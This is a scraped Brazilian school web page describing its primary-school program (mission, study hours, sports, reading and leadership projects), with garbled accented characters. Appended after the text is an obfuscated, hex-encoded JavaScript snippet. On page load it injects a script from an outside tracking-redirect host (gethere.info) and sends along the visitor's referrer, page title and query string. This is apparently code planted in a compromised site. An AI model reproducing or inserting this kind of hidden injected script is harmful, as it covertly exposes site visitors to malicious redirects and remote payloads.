Ensino Fundamental I – 1A? ao 5A? ano

colegio sigma brasilia_23

No Ensino Fundamental I, o SIGMA oferece educaA�A?o de excelA?ncia, com o objetivo de formar estudantes autA?nomos, orientados no caminho do conhecimento, estimulados a raciocinar e a buscar novas informaA�A�es, assim como a interagir em ambientes sociais com atitudes de respeito ao outro, com responsabilidade e com solidariedade.

MissA?o:

Desenvolver a capacidade de continuar aprendendo, assumindo como pressupostos bA?sicos o domA�nio da leitura, da escrita e do cA?lculo. As atividades sA?o feitas de forma cooperativa, com interferA?ncia provocativa do educador. Levam o aluno a assumir postura de pesquisador. Instigamos o desenvolvimento do protagonismo, pois ele conduz os estudantes a transformaA�A�es que ultrapassam o aprendizado de conteA?dos.

– PlantA?o de estudos no contra-turno;_MG_9037
– Aulas de EducaA�A?o TecnolA?gicas;
– Escolinha de esportes: sA?o mais de 10 opA�A�es de prA?tica esportiva disponA�veis para o aluno.

Projetos:A�

– O LA�der em Mim: aprendizado de lideranA�a, valores e competA?ncias fundamentais para o sucesso na escola e na vida.
– ExcursA�es PedagA?gicas: trocas de conhecimento que facilitam a aprendizagem e socializaA�A?o dos alunos e professores. Os conteA?dos contam com liA�A�es de vida, economia, organizaA�A?o, respeito, socializaA�A?o, etc.

_MG_9509


– Ciranda de livros:
criar e estimular o hA?bito da leitura, atravA�s da troca de livros e de rodas de conversa pA?s-leitura. Utilizam-se diferentes tipos de textos e de histA?rias, para que a crianA�a descubra aquilo que mais a atrai no mundo mA?gico da literatura.
– PlantA?o de Estudos:A�momento dedicado A� realizaA�A?o das atividades de casa com auxA�lio de monitores e/ou professores.
– EducaA�A?o tecnolA?gica:A�projeto em que os alunos aprendem, brincando, conceitos tecnolA?gicos e cientA�ficos.

 var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}